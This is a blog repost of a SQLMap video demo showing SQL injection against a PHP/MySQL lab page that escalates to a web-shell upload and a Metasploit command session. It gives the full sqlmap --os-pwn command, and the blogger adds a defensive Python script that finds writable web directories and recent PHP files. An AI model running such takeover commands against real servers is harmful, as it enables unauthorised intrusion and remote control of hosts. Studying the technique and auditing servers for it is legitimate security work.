Thursday, September 15, 2011

HOWTO : Official SQLMap video demonstration 11

*** Do NOT attack any computer or network without authorization or you may be put into jail. ***

Credit to : Bernardo

This is Bernardo's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server, with the back-end database management system being MySQL 5.1.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band command prompt session between the user's machine and the database server. When the back-end database is MySQL, the ASP and PHP languages do not support stacked queries (ASP.NET does, though): there is no way to inject different SQL statements in the same HTTP request.

As a result, sqlmap uploads a web shell into a writable directory within the web server document root and uses it to execute the Metasploit payload stager created previously. The out-of-band command prompt session is now established and control is passed over to the Metasploit command line interface.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1
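The takeover described above depends on one precondition: a directory under the web server document root that a service account can write to. As an added defender's check (my own script, not part of Bernardo's video or of sqlmap), the Python below audits a document root for group- or world-writable directories and lists PHP files recently created in them; the sample document root it builds is constructed for the dry run.

```python
import os
import stat
import tempfile
import time

# Extensions the web server would execute if a file were dropped into a
# writable directory under its document root.
SCRIPT_EXTENSIONS = {".php", ".php3", ".phtml"}


def is_writable_by_others(path):
    """True if `path` is group- or world-writable, i.e. writable by service
    accounts (web server, database) that do not own it."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_recent_scripts(root, max_age_seconds=24 * 3600, now=None):
    """Walk `root` and return (directory, [recent script files]) for every
    directory other accounts can write to. Files are listed, never touched."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, _subdirs, filenames in os.walk(root):
        if not is_writable_by_others(dirpath):
            continue
        recent = []
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            if now - os.stat(full).st_mtime <= max_age_seconds:
                recent.append(full)
        findings.append((dirpath, sorted(recent)))
    return findings


def build_constructed_docroot():
    """Constructed sample layout: a locked-down document root with one
    world-writable 'uploads' directory holding a fresh placeholder PHP file."""
    root = tempfile.mkdtemp(prefix="docroot_")
    os.chmod(root, 0o755)
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    os.chmod(uploads, 0o777)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")
    with open(os.path.join(uploads, "tmpupload.php"), "w") as fh:
        fh.write("<?php // constructed placeholder, not a shell\n")
    return root
```

On a real host, call `find_recent_scripts("/var/www")` (path assumed) from a periodic job and review every listed file; an empty result for every directory means no executable file landed in a writable location within the window.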

That's all! See you.